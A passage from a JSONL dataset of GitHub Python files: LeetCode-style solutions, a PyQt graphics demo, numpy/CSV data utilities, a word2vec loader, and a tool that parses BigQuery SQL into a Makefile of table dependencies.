parts[0] = self.colorize(parts[0], record)\n message = '\\n'.join(parts)\n return message\n\ndef main():\n root = logging.getLogger()\n root.setLevel(logging.DEBUG)\n root.addHandler(ColorizingStreamHandler())\n logging.debug('DEBUG')\n logging.info('INFO')\n logging.warning('WARNING')\n logging.error('ERROR')\n logging.critical('CRITICAL')\n\nif __name__ == '__main__':\n main()\n","repo_name":"eldraco/domain_analyzer","sub_path":"ansistrm.py","file_name":"ansistrm.py","file_ext":"py","file_size_in_byte":4687,"program_lang":"python","lang":"en","doc_type":"code","stars":1830,"dataset":"github-code","pt":"52"} +{"seq_id":"7199138090","text":"'''\nGiven a binary search tree (BST),\nfind the lowest common ancestor (LCA) of two given nodes in the BST.\nAccording to the definition of LCA on Wikipedia:\n“The lowest common ancestor is defined between two nodes v and w as the lowest node\n in T that has both v and w as descendants\n (where we allow a node to be a descendant of itself).”\n BST的暴力法特别简单,使用递归的思路求解:\n1, 如果 当前节点(从root开始) 的值大于p, q的值,那么公共祖先一定在树的左分支\n2, 如果 当前节点的值小于p, q节点的值,那么公共祖先一定在树的右分支\n3, 如果当前节点的值大于p(或者q), 小于q(或者p), 那么该节点就是目标节点\n'''\n\n\n# Definition for a binary tree node.\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution(object):\n def lowestCommonAncestor(self, root, p, q):\n \"\"\"\n :type root: TreeNode\n :type p: TreeNode\n :type q: TreeNode\n :rtype: TreeNode\n \"\"\"\n if root.val is None:\n return\n if p.val > root.val and q.val > root.val:\n return self.lowestCommonAncestor(root.right, p, q)\n if p.val < root.val and q.val < root.val:\n return self.lowestCommonAncestor(root.left, p, q)\n\n return root.val\n\n\nmySolution = Solution()\nroot = TreeNode(6)\nroot.left = TreeNode(2)\nroot.left.left = TreeNode(0)\nroot.left.right = TreeNode(4)\nroot.left.right.left = TreeNode(3)\nroot.left.right.right = TreeNode(5)\np = TreeNode(5)\nq = TreeNode(4)\nre = mySolution.lowestCommonAncestor(root, p, q)\nprint(re)\n","repo_name":"sheldonzhao/LeetCodeFighting","sub_path":"235. LCA of BST 2.0.py","file_name":"235. LCA of BST 2.0.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16540843479","text":"# EXERCISE 130 : Unary and Binary Operators\n\nfrom ex_129 import token_list\n\n\ndef identify_unary(tokens):\n retval = []\n\n for i in range(len(tokens)):\n if i == 0 and (tokens[i] == \"+\" or tokens[i] == \"-\"):\n retval.append(\"u\" + tokens[i])\n\n elif i > 0 and (tokens[i] == \"+\" or tokens[i] == \"-\") and \\\n (tokens[i-1] == \"+\" or tokens[i-1] == \"-\" or tokens[i-1] == \"*\" or tokens[i-1] == \"/\" or tokens[i-1] == \"(\"):\n retval.append(\"u\" + tokens[i])\n else:\n retval.append(tokens[i])\n\n return retval\n\n\ndef main():\n exp = input(\"Enter a mathematical expression: \")\n tokens = token_list(exp)\n print(f\"The tokens are: {tokens}\")\n\n marked = identify_unary(tokens)\n print(f\"With unary operators marked: {marked}\")\n\n\nif __name__ == '__main__':\n main()","repo_name":"AndreaOrlando23/the-python-workbook","sub_path":"Cap_5_Lists/ex_130_TODO.py","file_name":"ex_130_TODO.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"18153764794","text":"from typing import Optional\n\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\nclass Solution:\n def reverseList(self, head: Optional[ListNode]) -> Optional[ListNode]:\n prev = None\n while head:\n nxt = head.next\n head.next = prev\n prev = head\n head = nxt\n return prev\n\nif __name__ == \"__main__\":\n def printListNode(lst):\n while lst != None:\n print(lst.val, end=\" \")\n lst = lst.next\n soln = Solution()\n printListNode(soln.reverseList(\n ListNode(2, ListNode(4, ListNode(3)))\n ))\n","repo_name":"Mr-MaNia7/Competitive-Programming","sub_path":"LinkedList/reverse-linked-list.py","file_name":"reverse-linked-list.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10572599658","text":"from colorama import init\ninit(autoreset=True)\nfrom colorama import Fore\nfrom itertools import permutations\nfrom collections import OrderedDict\nfrom keras import backend as K\nfrom tkinter import *\nimport xlsxwriter\nimport xlrd\nimport csv\nimport numpy as np\nimport pandas as pd\nimport os\nimport math\n\narray_data_size = 32\n\ndef csvread(filelist, filetype):\n data = []\n filename_history = []\n for i in range(0, len(filelist)):\n filename = filelist[i]\n filename_history.append(filename)\n print(Fore.BLUE+'file type :', filetype, Fore.CYAN+'//', Fore.BLUE+'file name :', filename_history, end = '\\r')\n data_parsing = read_csv(filename+filetype+'.csv')\n data.append(data_parsing)\n print() \n print(str(i+1), 'files', Fore.YELLOW+'done')\n return(data)\n\ndef csvread_temp(filelist, filetype):\n data = []\n filename_history = []\n for i in range(0, len(filelist)):\n filename = filelist[i]\n filename_history.append(filename)\n print(Fore.BLUE+'file type :', filetype, Fore.CYAN+'//', Fore.BLUE+'file name :', filename_history, end = '\\r')\n data_parsing = read_csv(filename+filetype+'_angle.csv')\n temp_data = read_csv(filename+filetype+'_esty.csv')\n data_parsing[:, 1] = temp_data[:, 0]\n data.append(data_parsing)\n print() \n print(str(i+1), 'files', Fore.YELLOW+'done')\n return(data)\n\ndef chartofloatarray(data):\n data_out = []\n for i in range(0, len(data)):\n data_temp = data[i]\n data_out_temp = np.zeros((len(data_temp), len(data_temp[0])))\n data_out_temp[:, :] = data_temp[:, :]\n data_out.append(data_out_temp)\n return(data_out)\n\ndef dataselection(data, position):\n data_out = np.zeros((len(data), len(position)))\n for count in range(len(position)):\n data_out[:, count] = data[:, position[count]-1]\n return(data_out)\n\ndef listtoarray(list_data):\n row_size = len(list_data)\n col_size = 0\n for line in list_data:\n if len(line) > col_size:\n col_size = len(line)\n\n array_data = np.chararray((row_size, col_size), itemsize = array_data_size, unicode = True)\n\n for row_count, line in enumerate(list_data):\n for col_count, data in enumerate(line):\n if data == '':\n data = 0\n array_data[row_count, col_count] = data\n\n # print(row_size, col_size)\n return(array_data)\n\ndef polyval(p, data):\n data_out = 0\n for i in range(len(p)):\n data_out += p[i]*data**(len(p)-1-i)\n return(data_out)\n\ndef listtoarray2(data):\n if len(data) != 1:\n for count in range(len(data)):\n if count == 0:\n data_out = data[count]\n else:\n data_out = np.vstack((data_out, data[count]))\n else:\n data_out = data[0]\n return(data_out)\n \ndef removefiles(filepath):\n for file in os.scandir(filepath):\n os.remove(file.path)\n\ndef probar(iteration, total, prefix, length, verbose = 1):\n if verbose == 1:\n decimals = 1\n fill = '█'\n space_init = math.floor(math.log10(total))\n if iteration == 0:\n space = ' '*space_init\n else:\n space = ' '*(space_init-math.floor(math.log10(iteration)))\n percent = (\"{0:.\" + str(decimals) + \"f}\").format(100 * (iteration / float(total)))\n filledLength = int(length * (iteration) // (total))\n bar = fill * filledLength + '-' * (length - filledLength)\n print(Fore.BLUE+prefix, ':', space+'%d/%d |%s| %s%%' %(iteration, total, bar, percent), end = '\\r')\n if iteration == total: \n print()\n\ndef read_csv(filename):\n with open(filename, newline='', encoding = 'utf-8') as csvfile:\n data_read = list(csv.reader(csvfile))\n\n data_temp = listtoarray(data_read)\n if data_temp[0, 0] == 'Format Version':\n data_out = data_temp[7:, 2:]\n else:\n data_out = data_temp\n\n return(data_out)\n\ndef reshape2to3(data, window_size, data_type):\n row = len(data)\n col = len(data[0])\n if data_type == 'input':\n data_out = np.zeros((row-window_size+1, window_size, col))\n for j in range(0, row-window_size+1):\n for i in range(j, window_size+j):\n data_out[j, i-j, :] = data[i, :]\n elif data_type == 'output':\n data_out = np.zeros((row-window_size+1, col))\n for j in range(0, row-window_size+1):\n data_out[j, :] = data[j+window_size-1, :]\n return(data_out)\n\ndef dataconvert(data, position, window_size = None, data_type = None):\n data = listtoarray2(data)\n data = dataselection(data, position)\n data = reshape2to3(data, window_size, data_type)\n return(data)\n\ndef dataconvert_input(strain, window_size, input_index):\n strain = listtoarray2(strain)\n strain_temp = np.zeros((len(strain), len(input_index)))\n for i in range(0, len(strain)):\n for j in range(len(input_index)):\n strain_temp[i, j] = strain[i, input_index[j]-1]\n strain_split = reshape2to3(strain_temp, window_size, 'input')\n return(strain_split)\n\ndef dataconvert_output(angle, window_size, output_index):\n angle = listtoarray2(angle)\n angle_temp = np.zeros((len(angle), len(output_index)))\n for i in range(0, len(angle)):\n for j in range(len(output_index)):\n angle_temp[i, j] = angle[i, output_index[j]-1]\n angle_split = reshape2to3(angle_temp, window_size, 'output')\n return(angle_split)\n\ndef dataconvert_output2(angle, window_size, output_index):\n angle = listtoarray2(angle)\n angle_temp = np.zeros((len(angle), 1))\n for i in range(0, len(angle)):\n for j in range(len(output_index)):\n angle_temp[i, j] = customsigmoid(angle[i, output_index[j]-1])\n angle_split = reshape2to3(angle_temp, window_size, 'output')\n return(angle_split)\n\ndef init_display(x_train, y_train):\n print(Fore.MAGENTA + 'Supervised learning')\n print(Fore.BLUE+'sensor count', ':', len(x_train[0][0]), Fore.CYAN+'//', Fore.BLUE+'angle count', ':', len(y_train[0]))\n print(Fore.BLUE+'window size :', len(x_train[0]))\n print(Fore.BLUE+'batch size', ':', len(x_train))\n\ndef customsigmoid(x):\n c1 = 0.1\n c2 = 70\n # c1 = 1\n # c2 = 40\n return (1/(1+math.exp(-c1*(x-c2))))\n\n# def customsigmoid(x):\n# # c1 = 0.1\n# # c2 = 70\n# c1 = 1\n# c2 = 40\n# return (K.sigmoid(-c1*(x-c2)))\n\ndef data_analysis(est, ref):\n # rmse\n error_sum = 0\n for i in range(len(est)):\n error_sum += math.pow((est[i, 0]-ref[i, 0]), 2)/len(est)\n rmse = math.sqrt(error_sum)\n\n # max error\n max_list = []\n for i in range(len(est)):\n max_list.append(abs(est[i, 0]-ref[i, 0]))\n max_error = max(max_list)\n\n return(rmse, max_error)\n\ndef csv_append(filename, data, sensor_position, row_offset, column_offset):\n count = 0\n row_count = 0\n row_data = []\n [data_size1, data_size2] = np.shape(data)\n with open(filename, 'r') as read_obj:\n csv_read = csv.reader(read_obj)\n for row in csv_read:\n if count >= row_offset:\n start_index= data_size2*sensor_position[0]-1-column_offset\n end_index = data_size2*sensor_position[0]-1-column_offset+data_size2\n row[start_index:end_index] = data[row_count, 0:data_size2]\n row_count += 1\n row_data.append(row)\n count += 1\n\n with open(filename, 'w', newline = '') as write_obj:\n csv_writer = csv.writer(write_obj)\n for i in range(len(row_data)):\n csv_writer.writerow(row_data[i])\n\ndef listappend(list1, list2):\n list_out = []\n for i in range(len(list1)):\n list_out.append(list1[i])\n for i in range(len(list2)):\n list_out.append(list2[i])\n return(list_out)","repo_name":"minhyuklee/Practice","sub_path":"generic.py","file_name":"generic.py","file_ext":"py","file_size_in_byte":7779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5226345889","text":"import gensim\nfrom gensim.models import KeyedVectors\n\nGN_PATH = '../models/external_w2v/GoogleNews-vectors-negative300.bin'\n\nclass WordModel:\n def __init__(self,model):\n self.model = model\n self.vocab = model.wv.vocab\n example_word = next(iter(self.vocab))\n self.zero = 0.0*self.model[example_word]\n\n def __getitem__(self,key):\n if(isinstance(key,str)):\n word = key\n return (self.model[word] if word in self.vocab else self.zero)\n else:\n word_list = key\n return [(self.model[word] if word in self.vocab else self.zero) for word in word_list]\n\ndef load_word_model():\n model = KeyedVectors.load_word2vec_format(GN_PATH, binary=True)\n return WordModel(model)\n\n","repo_name":"jacobmaibach/derived-measures","sub_path":"programs/w2v.py","file_name":"w2v.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6151606361","text":"\"\"\"\nЗадача:\n\nФункция solution принимает массив. Элемента массива являются тоже массивами с 2 числами - координатами на оси. То есть\nмассив вида [[5, 10], [1, 3], [4, 6]] представляет собой координаты на оси:\n\n 0--1-----3--4--5--6----------10-->\n ------- -------\n ---------------\n\nЗадача заключается в объединении пересекающихся отрезков. В нашем примере [1, 3] и [4, 6] не пересекаются, а [4, 6]\nи [5, 10] пересекаются и их нужно объединить в отрезок [4, 10].\n\nПринцип работы:\n\nПринцип работы довольно прост. Для начала нам нужно отсортировать элемента массива по первому элемента внутреннего\nмассива. То есть сортируем по ним:\n\n [[5, 10], [4, 6], [1, 3]]\n _ _ _\n\nПолучаем массив: [[1, 3], [4, 6], [5, 10]]. Половина дела сделана. Осталось только понять, как найти пересекающиеся\nотрезки. Здесь все просто. При сравнении двух пересекающихся отрезков [x1, x2] и [x3, x4] нам надо взять последнюю\nкоординату первого отрезка (x2) и первую координату второго отрезка (x3). Если x2 >= x3, то второй отрезок\nпересекается с первым. В нашем примере это отрезки [[4, 6], [5, 10]]. 6 >= 5 => отрезки пересекаются.\n\nДалее нам нужно понять как их объединять в один общий отрезок. Посмотрим опять на абстрактный пример:\n\n [[x1, x2], [x3, x4]]\n\nЕсли x2 >= x3 => пересекаются => начало объединенного отрезка будет начинаться с x1:\n\n [[x1, ?]]\n\nА конец объединенного отрезка будет зависеть от того, где кончаются оба отрезка. Если x2 >= x4, тогда конец будет x2,\nиначе x4. То есть нам надо узнать какой из концов двух отрезков максимальный:\n\n [[x1, max(x2, x4)]]\n\nВот и вся реализация.\n\n\"\"\"\n\n\ndef sort(array: list):\n array.sort()\n\n\ndef solution(array: list):\n sort(array)\n\n result = [array[0]]\n for i in range(1, len(array)):\n last_end = result[-1][-1]\n if last_end >= array[i][0]:\n result[-1][-1] = max(array[i][-1], last_end)\n else:\n result.append(array[i])\n\n return result\n\n\ndef main():\n n = int(input().strip())\n array = []\n for _ in range(n):\n inner_array = list(map(int, input().strip().split()))\n array.append(inner_array)\n\n result = solution(array)\n for elem in result:\n print(\" \".join(map(str, elem)))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"RamazanPython/algs","sub_path":"sprint_3/homework/task_n/task_n.py","file_name":"task_n.py","file_ext":"py","file_size_in_byte":3278,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8743483047","text":"# -*- coding: utf-8 -*-\nfrom PyQt4 import QtCore, QtGui\nimport sys\n\ndef on_clicked():\n print(\"Нажата кнопка\")\n\napp = QtGui.QApplication(sys.argv)\nwindow = QtGui.QWidget()\nwindow.setWindowTitle(\"Класс QGraphicsScene\")\nwindow.resize(600, 400)\n\nscene = QtGui.QGraphicsScene(0.0, 0.0, 500.0, 335.0)\nscene.setBackgroundBrush(QtCore.Qt.white)\n\nw = QtGui.QWidget()\nw.move(50, 50)\nw.resize(300, 50)\nbtn = QtGui.QPushButton(\"Командная кнопка\")\nbtn.clicked.connect(on_clicked)\nb = QtGui.QVBoxLayout()\nb.addWidget(btn)\nw.setLayout(b)\nwidget1 = scene.addWidget(w, QtCore.Qt.Window)\nwidget1.setWindowTitle(\"Заголовок окна 1\")\n\nw2 = QtGui.QWidget()\nw2.move(50, 250)\nw2.resize(300, 50)\nwidget2 = scene.addWidget(w2, QtCore.Qt.Window)\nwidget2.setWindowTitle(\"Заголовок окна 2\")\n\nview = QtGui.QGraphicsView(scene)\n\nbox = QtGui.QVBoxLayout()\nbox.addWidget(view)\nwindow.setLayout(box)\n\nwindow.show()\nscene.setActiveWindow(widget2)\nsys.exit(app.exec_())","repo_name":"syurskyi/Python_Topics","sub_path":"140_gui/pyqt_pyside/examples/PyQt_PySide_book/007_Graphic scene/001_Class_QGraphicsScene/601. addWidget.py","file_name":"601. addWidget.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"14848131475","text":"#!/usr/bin/env python\n\n\nimport functools as ft\nimport argparse\nimport sqlparse as sp\nfrom sqlparse.tokens import Whitespace, Newline, Keyword, Name, Punctuation, DDL\nfrom sqlparse.sql import TokenList, Comment\nfrom glob import glob\nfrom io import StringIO\nimport logging\nimport re\nimport subprocess\n\n\ndef flatten(lss):\n return ft.reduce(lambda x, y: x+y, list(lss))\n\n\ndef is_neligible(token):\n return (token.ttype is Whitespace) or \\\n (token.ttype is Newline) or \\\n (token.ttype is None and isinstance(token, Comment)) or \\\n (token.ttype is Name and token.value == \"#standardSQL\")\n\n\ndef extract(tokens):\n tokens = [t for t in tokens if not is_neligible(t)]\n for t in tokens:\n if isinstance(t, TokenList):\n yield from extract(t)\n else:\n yield t\n\n\nclass ParseError(Exception):\n pass\n\n\nclass UnexpectedToken(ParseError):\n def __init__(self, exp, got, tokens):\n super(UnexpectedToken, self).__init__(\n f\"expected {exp} but got {got}:\\n{' '.join([t.value for t in tokens])}\")\n\n\ndef term(val, ttype):\n def ret(tokens):\n token = tokens[0]\n if token.ttype is ttype and token.value.upper() == val.upper():\n return 1\n else:\n raise UnexpectedToken(val.upper(), token.value, tokens)\n return ret\n\n\ncreate_term = term(\"CREATE\", DDL)\ntable_term = term(\"TABLE\", Keyword)\nas_term = term(\"AS\", Keyword)\n\n\ndef create_or_replace_term(tokens):\n token = tokens[0]\n if token.ttype is DDL and re.match(r\"CREATE +OR +REPLACE\", token.value.upper()):\n return 1\n else:\n raise UnexpectedToken(\"CREATE OR REPLACE\", token.value, tokens)\n\n\ndef table_name(tokens, ls):\n token = tokens[0]\n if token.ttype is Name:\n ls.append(token.value.replace(\"`\", \"\"))\n return 1\n else:\n raise UnexpectedToken(\"TABLE NAME\", token.value, tokens)\n\n\ndef create_sentence(tokens, targets, sources):\n pos = 0\n if tokens[pos].value.upper() == \"CREATE\":\n pos += create_term(tokens)\n else:\n pos += create_or_replace_term(tokens)\n pos += table_term(tokens[pos:])\n pos += table_name(tokens[pos:], targets)\n pos += as_term(tokens[pos:])\n gather_sources(tokens[pos:], sources)\n return targets, sources\n\n\ndef gather_sources(tokens, sources):\n for t in tokens:\n m = re.match(\"`(.+)`\", t.value)\n if m:\n sources.append(m[1])\n\n\ndef analyze_statement(st):\n tokens = [t for t in extract(st)]\n sources, targets = [], []\n if len(tokens) == 0:\n return sources, targets\n if re.match(\"CREATE.*\", tokens[0].value.upper()):\n create_sentence(tokens, targets, sources)\n else:\n gather_sources(tokens, sources)\n return targets, sources\n\n\ndef parse(sql):\n targets = []\n sources = []\n statements = sp.parse(sql)\n for s in statements:\n t, s = analyze_statement(s)\n targets += t\n sources += s\n sources2 = list(set(sources))\n return targets, sources2\n\n\ndef done(f):\n return \"done.\" + re.sub(r\"(.*).sql$\", r\"\\1\", f)\n\n\nclass Dependency:\n def __init__(self, t, s, f):\n self.targets = t\n self.sources = s\n self.file = f\n\n def filter(self, targets):\n s = [s for s in self.sources if s in targets]\n return Dependency(self.targets, s, self.file)\n\n def rule(self, s2f):\n return \"\"\"{target}: {sources}\n\\tcat {file} | bq query\n\\ttouch $@\n\"\"\".format(target=done(self.file),\n sources=self.file + \" \" + \" \".join(\n set([done(s2f[s])\n for s in self.sources])),\n file=self.file)\n\n\ndef create_makefile(ds):\n targets = flatten([d.targets for d in ds])\n if len(targets) != len(set(targets)):\n raise RuntimeError(\n f\"some targets are defined in multiple files: {targets}\")\n ds2 = [d.filter(targets) for d in ds]\n sources = flatten([d.sources for d in ds])\n\n def search(s):\n for d in ds2:\n if s in d.targets:\n return d.file\n s2f = {\n s: search(s)\n for s in sources\n }\n\n with open(\"Makefile\", \"w\") as f:\n f.write(\"\"\".PHONY: all\n\nall: {}\n\n\"\"\".format(\" \".join([done(d.file) for d in ds2])))\n f.write(\"\\n\".join([\n d.rule(s2f) for d in ds2\n ]))\n\n\ndef main(args):\n fnames = glob(\"*.sql\")\n dependencies = []\n for fname in fnames:\n with open(fname) as f:\n sql = \"\\n\".join(f.readlines())\n t, s = parse(sql)\n dependencies.append(Dependency(t, s, fname))\n create_makefile(dependencies)\n cmd = [\"make\", \"-j\", str(args.parallel)]\n subprocess.run(cmd)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-p\", \"--parallel\", default=8)\n args = parser.parse_args()\n\n logging.basicConfig(\n filename=\"parse.log\",\n level=logging.DEBUG,\n format=\"[%(levelname)s]%(asctime)s %(message)s\",\n datefmt=\"%Y-%m-%d %H:%M:%S\"\n )\n main(args)\n","repo_name":"hotoku/sqline","sub_path":"bqrun/parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":5002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5660167566","text":"import csv\n\nfrom Bio import SeqIO\n\nfrom collections import Counter\n\n\ndef read_in_vars(var_handle):\n vars = []\n\n with open(var_handle) as fi:\n lines = fi.readlines()\n\n for line in lines[1:]:\n # print()\n\n vars.append(line.strip().split(','))\n\n return vars\n\n\ndef read_in_genome(genome_handle):\n output_genome = {}\n\n genome = SeqIO.parse(genome_handle, 'fasta')\n\n for x in genome:\n # print(x)\n\n assert x.id not in output_genome\n\n output_genome[x.id] = x.seq\n\n return output_genome\n\n\ndef char_vars(vars, genome, guppy):\n \"\"\"\n\n 1. what nucleotide follows the variant position?\n\n 2. is there a homopolymer of that nucleotide?\n\n a. if so, how long is it?\n\n \"\"\"\n insertion_error_in_homopolymer = 0\n deletion_error_in_homopolymer = 0\n nt_count_dict = {'A': [], 'T': [], 'C': [], 'G': []}\n for var in vars:\n #print(var)\n if len(var[2]) != len(var[3]):\n pos = int(var[1])\n ref_nt = genome[var[0]][pos - 1]\n following_nt = genome[var[0]][pos]\n\n # non-matching insertions into homopolymers e.g. AAA -> ATAA\n alt_string = ''.join(genome[var[0]][pos - 1: pos + 100])\n alt_string = alt_string.replace(var[2], var[3], 1)\n if alt_string.startswith(('AA', 'TT', 'CC', 'GG')):\n k = -(len(var[2]) - len(var[3]))\n # k = 0\n for nt in alt_string:\n if nt == ref_nt:\n # print(genome[var[0]][pos:pos + 2])\n k += 1\n else:\n # print(i)\n if k > 1:\n insertion_error_in_homopolymer += 1\n # if i == 1:\n # print()\n # print(var)\n # print('remember that the count on the line below referes to the alt, not the ref which is the sequence below')\n # print(f'The following nt is {ref_nt} & its count is {k}')\n # print(f\"Finding homopolymer of length 1 on position {(pos - 1)} in the genome\" )\n # print(genome[var[0]][pos-1:pos+10])\n # print(guppy)\n break\n\n\n # this checks for if the variant position is the same as the following base.\n # if it is, then this error is likely to be an insertion of a different base within the homopolymer\n # deletions within homopolymers e.g. ATAA -> AAA\n elif genome[var[0]][pos - 1] == genome[var[0]][pos]:\n # check that the last base of hte alt isn't the same as the ref\n # not sure about this logic...\n if var[3][-1] != var[2][0]:\n # see explanation of j below where we set i\n j = -(len(var[2]) - len(var[3]))\n # j = 0\n for nt in genome[var[0]][pos - 1:pos + 1000]:\n if nt == following_nt:\n # print(genome[var[0]][pos:pos + 2])\n j += 1\n else:\n # print(i)\n if j > 1:\n deletion_error_in_homopolymer += 1\n # print()\n # print(var)\n # print(f'The following nt is {following_nt} & its count is {j}')\n # print('remember that the count on the line below referes to the alt, not the ref which is the sequence below')\n # print(f\"Finding homopolymer of length 1 on position {(pos - 1)} in the genome\" )\n # print(genome[var[0]][pos-1:pos+10])\n # print(guppy)\n break\n\n\n else:\n # print()\n # print(var)\n # print(genome[var[0]][pos - 1: pos + 10])\n # print(guppy)\n # print(genome[var[0]][pos - 1])\n\n # since we are using the nanopore genome as the reference, the alt actually contains information about\n # the true length of the variants. therefore, we need to change the length of thehomopolymers we're\n # reporting in order to reflect the alt, rathr than the ref.\n # we do this by taking away the lenght of the alt from the length of the ref and then flipping the sign\n # of the answer.\n i = -(len(var[2]) - len(var[3]))\n\n for nt in genome[var[0]][pos:pos + 1000]:\n if nt == following_nt:\n # print(genome[var[0]][pos:pos + 2])\n i += 1\n else:\n # print(i)\n nt_count_dict[following_nt].append(i)\n # if i == 1:\n # print()\n # print(var)\n # print('remember that the count on the line below referes to the alt, not the ref which is the sequence below')\n # print(f'The following nt is {following_nt} & its count is {i}')\n # print(f\"Finding homopolymer of length 1 on position {(pos - 1)} in the genome\" )\n # print(genome[var[0]][pos-1:pos+10])\n break\n\n # pprint.pprint(nt_count_dict)\n\n output_dict = {}\n for nt in nt_count_dict:\n output_dict.update({nt: Counter(nt_count_dict[nt])})\n # print(nt, Counter(nt_count_dict[nt]))\n\n return output_dict\n\n\ndef write_results(char_vars_output, guppy, output):\n \"\"\"\n\n :param guppy:\n :param char_vars_output: Output of char_vars() i.e a dict where nt are keys & counter obj are values for each nt\n :param output: name of csv file to be produced\n :return:\n \"\"\"\n\n with open(output, 'w') as out:\n writer = csv.writer(out)\n writer.writerow(['Nuc', 'Homopolymer Length', f'{guppy}count'])\n for nt in char_vars_output.keys():\n # char_vars_output will be dict obj with key == nt & value == Counter obj\n # print(char_vars_output[nt])\n\n for length in char_vars_output[nt]: # Homopolymer length in Counter obj\n writer.writerow([nt, length, char_vars_output[nt][length]])\n\n\ndef run_for_each_guppy(gcsv, gfasta, guppy_version, output):\n vars = read_in_vars(gcsv)\n genome = read_in_genome(gfasta)\n char_vars_results = char_vars(vars, genome, guppy_version)\n print(\"Writing to csv file\")\n write_results(char_vars_results, guppy_version, output)\n\n\ndef main():\n # # var_handle = '/Users/malcolmorian/acinetoBacterTestCase/acinetobacter_g5normed.csv'\n # #\n # # genome_handle = '/Users/malcolmorian/acinetoBacterTestCase/acineto_g5.fasta'\n # species = ['1_Acinetobacter_baumannii_J9','2_Citrobacter_koseri_MINF_9D','3_Enterobacter_kobei_MSB1_1B',\n # '4_Haemophilus_unknown_M1C132_1','5_Klebsiella_oxytoca_MSB1_2C','6_CHF10J',\n # '7_Klebsiella_variicola_INF345','8_Serratia_marcescens_17-147-1671']\n #\n # species_ref3_dir = '/Users/malcolmorian/Documents/Bioinformatics/Projects2021/Guppy3Guppy5/2021.08.17_NAPA/Indel_Xtrization/g3'\n # species_ref5_dir = '/Users/malcolmorian/Documents/Bioinformatics/Projects2021/Guppy3Guppy5/2021.08.17_NAPA/Indel_Xtrization/g5'\n #\n # for sp in species:\n # out3 = f'{species_ref3_dir}/{sp}/{sp}_g3indelChecked.csv'\n # out5 = f'{species_ref5_dir}/{sp}/{sp}_g5indelChecked.csv'\n # run_for_each_guppy(f'{species_ref3_dir}/{sp}/{sp}_g3norm.csv',\n # f'{species_ref3_dir}/{sp}/consensus.fasta', 'g3', out3)\n # run_for_each_guppy(f'{species_ref5_dir}/{sp}/{sp}_g5norm.csv', f'{species_ref5_dir}/{sp}/consensus.fasta', 'g5',\n # out5)\n\n acit = read_in_genome('/Users/malcolmorian/Documents/Bioinformatics/Projects2021/Guppy3Guppy5/2021.08.17_NAPA/Indel_Xtrization/g3/1_Acinetobacter_baumannii_J9/consensus.fasta')\n\n print(acit['contig_3'][4325:4346])\n\nif __name__ == '__main__':\n main()\n\n\n","repo_name":"MalcolmorianVII/Nanopore-only-SNP-and-Indel-calling-Nosc-","sub_path":"scripts/indel_char.py","file_name":"indel_char.py","file_ext":"py","file_size_in_byte":8288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41554919629","text":"import logging\nfrom typing import *\n\nfrom pyplant import specs\nfrom pyplant.pyplant import *\n# noinspection PyProtectedMember\nfrom pyplant.pyplant import Warehouse\n\n\ndef store_ingredients_to_dir(plant: Plant, ingredientNames: List[str], dirPath: str):\n with Warehouse(dirPath, plant.logger) as warehouse:\n # Don't take specs by ref, create new instances. Otherwise we'll close then when closing the warehouse.\n warehouse.register_ingredient_specs([type(spec)() for spec in plant.warehouse.ingredientSpecs.values()])\n for name in ingredientNames:\n ingredientValue = plant.fetch_ingredient(name)\n ingredientObj = plant.get_ingredient_object(name)\n\n warehouse.store(ingredientObj, ingredientValue)\n\n\ndef store_reactor_inputs_to_dir(plant: Plant, reactorName: str, dirPath: str):\n reactorObj = plant.reactors[reactorName]\n\n return store_ingredients_to_dir(plant, list(reactorObj.inputs), dirPath)\n\n\ndef load_ingredients_from_dir(dirPath: str,\n ingredientNames: Optional[Iterable[str]] = None,\n logger: Optional[logging.Logger] = None,\n customSpecs: Optional[List[specs.IngredientTypeSpec]] = None) -> Dict[str, Any]:\n if logger is None:\n logger = logging.getLogger('_null')\n logger.setLevel(logging.CRITICAL)\n\n ingredients = {}\n with Warehouse(dirPath, logger) as warehouse: # type: Warehouse\n if customSpecs:\n warehouse.register_ingredient_specs(customSpecs)\n # Either load specific ingredients or all of them.\n ingredientNames = ingredientNames or warehouse.manifest.keys()\n for name in ingredientNames:\n ingredients[name] = warehouse.fetch(name, signature=None)\n\n return ingredients\n","repo_name":"gleb-t/pyplant","sub_path":"pyplant/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"19986494157","text":" # importa pacote com rotinas relacionadas a operações do so\nimport os.path \n\n# declara vetores globais\ntimes= [];\ntime = [];\nconferencia = [];\nmascotes = [];\n\n\ndef titulo(texto, simbolo=\"-\"):\n print()\n print(texto)\n print(simbolo*23)\n\n\ndef incluirTimes():\n titulo(\"Inclusão de Times\")\n time = input(\"Time: \")\n# variável alterada de sel para selecionaConferencia\n selecionaConferencia = int(input(\"Conferência da equipe (1. Leste || 2. Oeste):\"))\n if selecionaConferencia == 1:\n \n times.append(time + ';Leste')\n print(f\"{time} inserido na conferencia LESTE \")\n else:\n\n times.append(time + ';Oeste')\n print(f\"{time} inserido na conferencia OESTE \")\n\ndef listarTimes():\n titulo(\" \"*20 + \"Lista de 